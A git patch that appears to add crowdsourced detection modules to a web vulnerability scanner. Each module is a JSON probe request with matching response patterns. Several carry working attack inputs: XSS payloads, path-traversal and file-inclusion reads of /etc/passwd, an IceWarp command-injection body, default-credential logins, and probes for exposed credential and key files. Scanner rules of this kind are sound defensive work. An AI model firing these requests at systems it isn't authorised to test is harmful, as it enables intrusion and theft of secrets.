From 344e1f73c4705991a3a467683ae005b8b04f07c0 Mon Sep 17 00:00:00 2001
From: Kristian Bremberg <kristian.bremberg@detectify.com>
Date: Tue, 20 Jul 2021 13:48:07 +0200
Subject: [PATCH] Add modules submitted through Crowdsource

---
 modules/crowdsourced/CVE-2017-9140.json       | 24 ++++++++
 modules/crowdsourced/CVE-2019-3402.json       | 26 ++++++++
 modules/crowdsourced/CVE-2021-28169.json      | 21 +++++++
 modules/crowdsourced/CVE-2021-32820.json      | 24 ++++++++
 .../activeadmin-panel-disclosure.json         | 23 +++++++
 .../crowdsourced/aem-invalidate-cache.json    | 24 ++++++++
 .../apache-airflow-debug-trace.json           | 24 ++++++++
 .../apache-superset-default-credentials.json  | 23 +++++++
 .../crowdsourced/appsec-yml-disclosure.json   | 53 ++++++++++++++++
 .../clockwork-dashboard-exposure.json         | 38 ++++++++++++
 .../dockerfile-hidden-disclosure.json         | 23 +++++++
 .../esmtprc-dotfile-disclosure.json           | 27 +++++++++
 .../crowdsourced/filezilla-disclosure.json    | 25 ++++++++
 .../git-credentials-disclosure.json           | 29 +++++++++
 .../github-workflows-disclosure.json          | 60 +++++++++++++++++++
 .../crowdsourced/gitlab-snippets-exposed.json | 21 +++++++
 .../hp-ilo-serial-key-disclosure.json         | 31 ++++++++++
 modules/crowdsourced/icewarp-mail-rce.json    | 27 +++++++++
 .../ilo-serial-key-disclosure.json            | 37 ++++++++++++
 .../kubernetes-kustomization-disclosure.json  | 44 ++++++++++++++
 .../laravel-telescope-exposure.json           | 23 +++++++
 .../nginx-merge-slashes-path-traversal.json   | 22 +++++++
 modules/crowdsourced/oracle-ebs-lfi.json      | 25 ++++++++
 .../crowdsourced/php-user-ini-disclosure.json | 43 +++++++++++++
 .../phpmyadmin-info-schema-disclosure.json    | 30 ++++++++++
 .../putty-private-key-disclosure.json         | 24 ++++++++
 .../crowdsourced/pyproject-disclosure.json    | 24 ++++++++
 .../roundcube-log-disclosure.json             | 23 +++++++
 ...ruby-on-rails-secret-token-disclosure.json | 24 ++++++++
 .../showdoc-default-password.json             | 22 +++++++
 .../snyk-ignore-file-disclosure.json          | 22 +++++++
 .../spring-boot-loggers-disclosure.json       | 31 ++++++++++
 .../ssh-authorized-keys-disclosure.json       | 20 +++++++
 .../symfony-fragment-exposure.json            | 25 ++++++++
 .../crowdsourced/thumbs-db-disclosure.json    | 16 +++++
 35 files changed, 978 insertions(+)
 create mode 100644 modules/crowdsourced/CVE-2017-9140.json
 create mode 100644 modules/crowdsourced/CVE-2019-3402.json
 create mode 100644 modules/crowdsourced/CVE-2021-28169.json
 create mode 100644 modules/crowdsourced/CVE-2021-32820.json
 create mode 100644 modules/crowdsourced/activeadmin-panel-disclosure.json
 create mode 100644 modules/crowdsourced/aem-invalidate-cache.json
 create mode 100644 modules/crowdsourced/apache-airflow-debug-trace.json
 create mode 100644 modules/crowdsourced/apache-superset-default-credentials.json
 create mode 100644 modules/crowdsourced/appsec-yml-disclosure.json
 create mode 100644 modules/crowdsourced/clockwork-dashboard-exposure.json
 create mode 100644 modules/crowdsourced/dockerfile-hidden-disclosure.json
 create mode 100644 modules/crowdsourced/esmtprc-dotfile-disclosure.json
 create mode 100644 modules/crowdsourced/filezilla-disclosure.json
 create mode 100644 modules/crowdsourced/git-credentials-disclosure.json
 create mode 100644 modules/crowdsourced/github-workflows-disclosure.json
 create mode 100644 modules/crowdsourced/gitlab-snippets-exposed.json
 create mode 100644 modules/crowdsourced/hp-ilo-serial-key-disclosure.json
 create mode 100644 modules/crowdsourced/icewarp-mail-rce.json
 create mode 100644 modules/crowdsourced/ilo-serial-key-disclosure.json
 create mode 100644 modules/crowdsourced/kubernetes-kustomization-disclosure.json
 create mode 100644 modules/crowdsourced/laravel-telescope-exposure.json
 create mode 100644 modules/crowdsourced/nginx-merge-slashes-path-traversal.json
 create mode 100644 modules/crowdsourced/oracle-ebs-lfi.json
 create mode 100644 modules/crowdsourced/php-user-ini-disclosure.json
 create mode 100644 modules/crowdsourced/phpmyadmin-info-schema-disclosure.json
 create mode 100644 modules/crowdsourced/putty-private-key-disclosure.json
 create mode 100644 modules/crowdsourced/pyproject-disclosure.json
 create mode 100644 modules/crowdsourced/roundcube-log-disclosure.json
 create mode 100644 modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json
 create mode 100644 modules/crowdsourced/showdoc-default-password.json
 create mode 100644 modules/crowdsourced/snyk-ignore-file-disclosure.json
 create mode 100644 modules/crowdsourced/spring-boot-loggers-disclosure.json
 create mode 100644 modules/crowdsourced/ssh-authorized-keys-disclosure.json
 create mode 100644 modules/crowdsourced/symfony-fragment-exposure.json
 create mode 100644 modules/crowdsourced/thumbs-db-disclosure.json

diff --git a/modules/crowdsourced/CVE-2017-9140.json b/modules/crowdsourced/CVE-2017-9140.json
new file mode 100644
index 0000000..765ce0d
--- /dev/null
+++ b/modules/crowdsourced/CVE-2017-9140.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000\"onload=\"prompt(1)"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200
+			},
+			{
+				"type": "static",
+				"pattern": "var ParametersPage = new ParametersPage"
+			},
+			{
+				"type": "static",
+				"pattern": "#000000\"onload=\"prompt(1);"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/CVE-2019-3402.json b/modules/crowdsourced/CVE-2019-3402.json
new file mode 100644
index 0000000..0518715
--- /dev/null
+++ b/modules/crowdsourced/CVE-2019-3402.json
@@ -0,0 +1,26 @@
+{
+	"request": {
+		"paths": [
+			"/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)text/html"
+			},
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "<script>alert(1)</script>"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/CVE-2021-28169.json b/modules/crowdsourced/CVE-2021-28169.json
new file mode 100644
index 0000000..102e360
--- /dev/null
+++ b/modules/crowdsourced/CVE-2021-28169.json
@@ -0,0 +1,21 @@
+{
+	"request": {
+		"paths": [
+			"/concat?/%2557EB-INF/web.xml"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)(text/xml|application/xml)"
+			},
+			{
+				"type": "static",
+				"pattern": "<web-app xmlns=\"http://java.sun.com/xml/ns/j2ee\""
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/CVE-2021-32820.json b/modules/crowdsourced/CVE-2021-32820.json
new file mode 100644
index 0000000..3bb0f57
--- /dev/null
+++ b/modules/crowdsourced/CVE-2021-32820.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"?layout=/etc/passwd"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "regex",
+				"pattern": "\\s*root:[x*]"
+			},
+			{
+				"type": "regex",
+				"pattern": "\\s*daemon:[x*]"
+			},
+			{
+				"type": "regex",
+				"pattern": "\\s*operator:[x*]:"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/activeadmin-panel-disclosure.json b/modules/crowdsourced/activeadmin-panel-disclosure.json
new file mode 100644
index 0000000..c2c7a53
--- /dev/null
+++ b/modules/crowdsourced/activeadmin-panel-disclosure.json
@@ -0,0 +1,23 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/admin"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)text/html",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "<p>Powered by <a href=\"http://www.activeadmin.info\">Active Admin"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/aem-invalidate-cache.json b/modules/crowdsourced/aem-invalidate-cache.json
new file mode 100644
index 0000000..f73f201
--- /dev/null
+++ b/modules/crowdsourced/aem-invalidate-cache.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"/dispatcher/invalidate.cache"
+		],
+		"headers": [
+			"CQ-Handle: /content",
+			"CQ-Path: /content"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200
+			},
+			{
+				"type": "regex",
+				"pattern": "^<H1>OK</H1>$"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/apache-airflow-debug-trace.json b/modules/crowdsourced/apache-airflow-debug-trace.json
new file mode 100644
index 0000000..376e7a5
--- /dev/null
+++ b/modules/crowdsourced/apache-airflow-debug-trace.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"/admin/airflow/login"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "status",
+				"code": 500
+			},
+			{
+				"type": "static",
+				"pattern": "<h1> Ooops. </h1>"
+			},
+			{
+				"type": "static",
+				"pattern": "Traceback (most recent call last)"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/apache-superset-default-credentials.json b/modules/crowdsourced/apache-superset-default-credentials.json
new file mode 100644
index 0000000..a070c35
--- /dev/null
+++ b/modules/crowdsourced/apache-superset-default-credentials.json
@@ -0,0 +1,23 @@
+{
+	"request": {
+		"method": "POST",
+		"path": "/login/",
+		"body": "username=admin&password=admin",
+		"headers": [
+			"Content-Type: application/x-www-form-urlencoded; charset=UTF-8"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "<title>Redirecting...</title>"
+			},
+			{
+				"type": "static",
+				"pattern": "<a href=\"/\">/</a>"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/appsec-yml-disclosure.json b/modules/crowdsourced/appsec-yml-disclosure.json
new file mode 100644
index 0000000..85618e9
--- /dev/null
+++ b/modules/crowdsourced/appsec-yml-disclosure.json
@@ -0,0 +1,53 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/appspec.yml",
+			"/appspec.yaml"
+		]
+	},
+	"response": {
+		"matchesRequired": 5,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)application/yaml",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "\"version\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"os\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"files\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"permissions\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"hooks\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"BeforeInstall\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"ApplicationStart\""
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/clockwork-dashboard-exposure.json b/modules/crowdsourced/clockwork-dashboard-exposure.json
new file mode 100644
index 0000000..8d4edde
--- /dev/null
+++ b/modules/crowdsourced/clockwork-dashboard-exposure.json
@@ -0,0 +1,38 @@
+{
+	"request": {
+		"paths": [
+			"/__clockwork/latest"
+		]
+	},
+	"response": {
+		"matchesRequired": 6,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)application/json",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "\"id\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"version\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"method\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"url\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"time\""
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/dockerfile-hidden-disclosure.json b/modules/crowdsourced/dockerfile-hidden-disclosure.json
new file mode 100644
index 0000000..6a45e5e
--- /dev/null
+++ b/modules/crowdsourced/dockerfile-hidden-disclosure.json
@@ -0,0 +1,23 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/.dockerfile",
+			"/.Dockerfile"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "regex",
+				"pattern": "^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\\#)\\s+[ -~]+"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/esmtprc-dotfile-disclosure.json b/modules/crowdsourced/esmtprc-dotfile-disclosure.json
new file mode 100644
index 0000000..cf55841
--- /dev/null
+++ b/modules/crowdsourced/esmtprc-dotfile-disclosure.json
@@ -0,0 +1,27 @@
+{
+	"name": "esmtprc dotfile",
+	"request": {
+		"path": "/.esmtprc"
+	},
+	"response": {
+		"matchesRequired": 4,
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "hostname"
+			},
+			{
+				"type": "static",
+				"pattern": "username"
+			},
+			{
+				"type": "static",
+				"pattern": "password"
+			},
+			{
+				"type": "status",
+				"code": 200
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/filezilla-disclosure.json b/modules/crowdsourced/filezilla-disclosure.json
new file mode 100644
index 0000000..7d5ba30
--- /dev/null
+++ b/modules/crowdsourced/filezilla-disclosure.json
@@ -0,0 +1,25 @@
+{
+	"request": {
+		"paths": [
+			"/FileZilla.xml"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)(text/xml|application/xml)"
+			},
+			{
+				"type": "static",
+				"pattern": "<RecentServers>"
+			},
+			{
+				"type": "static",
+				"pattern": "<FileZilla"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/git-credentials-disclosure.json b/modules/crowdsourced/git-credentials-disclosure.json
new file mode 100644
index 0000000..0c3c482
--- /dev/null
+++ b/modules/crowdsourced/git-credentials-disclosure.json
@@ -0,0 +1,29 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/.git-credentials"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "regex",
+				"pattern": "https?://[\\d\\w\\{\\}\\.%]+(?:|@)[\\d\\w\\{\\}\\.]+:[\\d\\w\\{\\}\\.]+(?:|@)[\\d\\w\\{\\}\\.\\?!~#@]+"
+			}
+		],
+		"mustNotMatch": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)text/html"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/github-workflows-disclosure.json b/modules/crowdsourced/github-workflows-disclosure.json
new file mode 100644
index 0000000..34da98a
--- /dev/null
+++ b/modules/crowdsourced/github-workflows-disclosure.json
@@ -0,0 +1,60 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/.github/workflows/ci.yml",
+			"/.github/workflows/ci.yaml",
+			"/.github/workflows/CI.yml",
+			"/.github/workflows/main.yml",
+			"/.github/workflows/main.yaml",
+			"/.github/workflows/build.yml",
+			"/.github/workflows/build.yaml",
+			"/.github/workflows/test.yml",
+			"/.github/workflows/test.yaml",
+			"/.github/workflows/tests.yml",
+			"/.github/workflows/tests.yaml",
+			"/.github/workflows/release.yml",
+			"/.github/workflows/publish.yml",
+			"/.github/workflows/deploy.yml",
+			"/.github/workflows/push.yml",
+			"/.github/workflows/lint.yml",
+			"/.github/workflows/coverage.yml",
+			"/.github/workflows/release.yaml",
+			"/.github/workflows/pr.yml",
+			"/.github/workflows/automerge.yml",
+			"/.github/workflows/docker.yml"
+		]
+	},
+	"response": {
+		"matchesRequired": 5,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)application/yaml",
+				"required": true
+			},
+			{
+				"type": "regex",
+				"pattern": "(?m)^\\s*\"?on\"?: "
+			},
+			{
+				"type": "regex",
+				"pattern": "(?m)^\\s*\"?jobs\"?:"
+			},
+			{
+				"type": "regex",
+				"pattern": "(?m)^\\s*\"?steps\"?:"
+			},
+			{
+				"type": "regex",
+				"pattern": "(?m)^\\s*- \"?uses\"?:"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/gitlab-snippets-exposed.json b/modules/crowdsourced/gitlab-snippets-exposed.json
new file mode 100644
index 0000000..d0fbae1
--- /dev/null
+++ b/modules/crowdsourced/gitlab-snippets-exposed.json
@@ -0,0 +1,21 @@
+{
+	"request": {
+		"paths": [
+			"/explore/snippets"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "<title>Snippets · Explore · GitLab</title>"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/hp-ilo-serial-key-disclosure.json b/modules/crowdsourced/hp-ilo-serial-key-disclosure.json
new file mode 100644
index 0000000..9947f99
--- /dev/null
+++ b/modules/crowdsourced/hp-ilo-serial-key-disclosure.json
@@ -0,0 +1,31 @@
+{
+	"reference": "https://github.com/nmap/nmap/issues/1016",
+	"request": {
+		"paths": [
+			"/xmldata?item=CpqKey"
+		]
+	},
+	"response": {
+		"matchesRequired": 4,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)text/html",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "LTYPE"
+			},
+			{
+				"type": "static",
+				"pattern": "LNAME"
+			},
+			{
+				"type": "static",
+				"pattern": "KEY"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/icewarp-mail-rce.json b/modules/crowdsourced/icewarp-mail-rce.json
new file mode 100644
index 0000000..c972cbf
--- /dev/null
+++ b/modules/crowdsourced/icewarp-mail-rce.json
@@ -0,0 +1,27 @@
+{
+	"request": {
+		"method": "POST",
+		"path": "/webmail/basic/",
+		"body": "_dlg[captcha][target]=system(\\'ver\\')\\",
+		"headers": [
+			"Content-Type: application/x-www-form-urlencoded"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "Microsoft Windows ["
+			},
+			{
+				"type": "status",
+				"code": 302
+			},
+			{
+				"type": "status",
+				"code": 200
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/ilo-serial-key-disclosure.json b/modules/crowdsourced/ilo-serial-key-disclosure.json
new file mode 100644
index 0000000..e82ea81
--- /dev/null
+++ b/modules/crowdsourced/ilo-serial-key-disclosure.json
@@ -0,0 +1,37 @@
+{
+	"request": {
+		"method": "GET",
+		"path": "/xmldata?item=CpqKey",
+		"headers": [
+			"Accept: text/xml"
+		]
+	},
+	"response": {
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "LTYPE",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "LNAME",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "KEY",
+				"required": true
+			},
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "^text/xml"
+			},
+			{
+				"type": "status",
+				"code": 200
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/kubernetes-kustomization-disclosure.json b/modules/crowdsourced/kubernetes-kustomization-disclosure.json
new file mode 100644
index 0000000..08227b7
--- /dev/null
+++ b/modules/crowdsourced/kubernetes-kustomization-disclosure.json
@@ -0,0 +1,44 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/kustomization.yml"
+		]
+	},
+	"response": {
+		"matchesRequired": 4,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)application/yaml",
+				"required": true
+			},
+			{
+				"type": "regex",
+				"pattern": "(?m)^\\s*apiVersion\\s*:\\s*kustomize\\.config"
+			},
+			{
+				"type": "regex",
+				"pattern": "(?mi)^\\s*kind\\s*:\\s*Kustomization"
+			},
+			{
+				"type": "regex",
+				"pattern": "(?m)^\\scommonLabels\\s*:"
+			},
+			{
+				"type": "regex",
+				"pattern": "(?m)^\\sresources\\s*:"
+			},
+			{
+				"type": "regex",
+				"pattern": "(?m)^\\snamespace\\s*:"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/laravel-telescope-exposure.json b/modules/crowdsourced/laravel-telescope-exposure.json
new file mode 100644
index 0000000..0e0accf
--- /dev/null
+++ b/modules/crowdsourced/laravel-telescope-exposure.json
@@ -0,0 +1,23 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/telescope"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)text/html",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "<strong>Laravel</strong> Telescope"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/nginx-merge-slashes-path-traversal.json b/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
new file mode 100644
index 0000000..42724c9
--- /dev/null
+++ b/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
@@ -0,0 +1,22 @@
+{
+	"request": {
+		"paths": [
+			"//////../../../etc/passwd",
+			"static//////../../../../etc/passwd",
+			"///../app.js"
+		]
+	},
+	"response": {
+		"matchesRequired": 1,
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "root:"
+			},
+			{
+				"type": "static",
+				"pattern": "app.listen"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/oracle-ebs-lfi.json b/modules/crowdsourced/oracle-ebs-lfi.json
new file mode 100644
index 0000000..f8d3b5d
--- /dev/null
+++ b/modules/crowdsourced/oracle-ebs-lfi.json
@@ -0,0 +1,25 @@
+{
+	"request": {
+		"method": "GET",
+		"path": "/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "regex",
+				"pattern": "root:"
+			},
+			{
+				"type": "status",
+				"code": 200
+			}
+		],
+		"mustNotMatch": [
+			{
+				"type": "regex",
+				"pattern": "(server error|not found)"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/php-user-ini-disclosure.json b/modules/crowdsourced/php-user-ini-disclosure.json
new file mode 100644
index 0000000..edd16c8
--- /dev/null
+++ b/modules/crowdsourced/php-user-ini-disclosure.json
@@ -0,0 +1,43 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/user.ini",
+			"/.user.ini"
+		]
+	},
+	"response": {
+		"matchesRequired": 5,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "assert"
+			},
+			{
+				"type": "static",
+				"pattern": "highlight"
+			},
+			{
+				"type": "static",
+				"pattern": "opcache"
+			},
+			{
+				"type": "static",
+				"pattern": "mssql"
+			},
+			{
+				"type": "static",
+				"pattern": "oci8"
+			},
+			{
+				"type": "static",
+				"pattern": "agent"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/phpmyadmin-info-schema-disclosure.json b/modules/crowdsourced/phpmyadmin-info-schema-disclosure.json
new file mode 100644
index 0000000..cb201b7
--- /dev/null
+++ b/modules/crowdsourced/phpmyadmin-info-schema-disclosure.json
@@ -0,0 +1,30 @@
+{
+	"request": {
+		"paths": [
+			"/index.php?db=information_schema"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200
+			},
+			{
+				"type": "static",
+				"pattern": "var common_query ="
+			},
+			{
+				"type": "static",
+				"pattern": "var pma_absolute_uri ="
+			}
+		],
+		"mustNotMatch": [
+			{
+				"type": "regex",
+				"pattern": "<label for=\"input_password\">Password:</label>"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/putty-private-key-disclosure.json b/modules/crowdsourced/putty-private-key-disclosure.json
new file mode 100644
index 0000000..dc7a6d7
--- /dev/null
+++ b/modules/crowdsourced/putty-private-key-disclosure.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"/my.ppk"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200
+			},
+			{
+				"type": "static",
+				"pattern": "PuTTY-User-Key-File"
+			},
+			{
+				"type": "static",
+				"pattern": "Encryption:"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/pyproject-disclosure.json b/modules/crowdsourced/pyproject-disclosure.json
new file mode 100644
index 0000000..549190b
--- /dev/null
+++ b/modules/crowdsourced/pyproject-disclosure.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"/pyproject.toml"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "[build-system]"
+			},
+			{
+				"type": "static",
+				"pattern": "[tool.poetry]"
+			},
+			{
+				"type": "status",
+				"code": 200
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/roundcube-log-disclosure.json b/modules/crowdsourced/roundcube-log-disclosure.json
new file mode 100644
index 0000000..6b7823e
--- /dev/null
+++ b/modules/crowdsourced/roundcube-log-disclosure.json
@@ -0,0 +1,23 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"roundcube/logs/sendmail",
+			"roundcube/logs/errors.log"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "IMAP Error:"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json b/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json
new file mode 100644
index 0000000..13483c5
--- /dev/null
+++ b/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json
@@ -0,0 +1,24 @@
+{
+	"request": {
+		"paths": [
+			"/config/initializers/secret_token.rb"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200
+			},
+			{
+				"type": "static",
+				"pattern": "secret_key_base ="
+			},
+			{
+				"type": "static",
+				"pattern": "config.secret_token ="
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/showdoc-default-password.json b/modules/crowdsourced/showdoc-default-password.json
new file mode 100644
index 0000000..e202142
--- /dev/null
+++ b/modules/crowdsourced/showdoc-default-password.json
@@ -0,0 +1,22 @@
+{
+	"name": "ShowDoc Default Password",
+	"request": {
+		"method": "POST",
+		"path": "/server/index.php?s=/api/user/login",
+		"body": "username=showdoc&password=123456"
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "groupid",
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "user_token"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/snyk-ignore-file-disclosure.json b/modules/crowdsourced/snyk-ignore-file-disclosure.json
new file mode 100644
index 0000000..417a96c
--- /dev/null
+++ b/modules/crowdsourced/snyk-ignore-file-disclosure.json
@@ -0,0 +1,22 @@
+{
+	"submitter": "Sebastian Neef (@gehaxelt),  https://cs.detectify.com/profile/gehaxelt",
+	"request": {
+		"paths": [
+			"/.snyk"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "static",
+				"pattern": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities."
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/spring-boot-loggers-disclosure.json b/modules/crowdsourced/spring-boot-loggers-disclosure.json
new file mode 100644
index 0000000..658874d
--- /dev/null
+++ b/modules/crowdsourced/spring-boot-loggers-disclosure.json
@@ -0,0 +1,31 @@
+{
+	"request": {
+		"paths": [
+			"/actuator/loggers",
+			"/loggers"
+		]
+	},
+	"response": {
+		"matchesRequired": 4,
+		"matches": [
+			{
+				"type": "header",
+				"name": "Content-Type",
+				"pattern": "(?i)(spring-boot.actuator|application/json)"
+			},
+			{
+				"type": "status",
+				"code": 200,
+				"required": true
+			},
+			{
+				"type": "static",
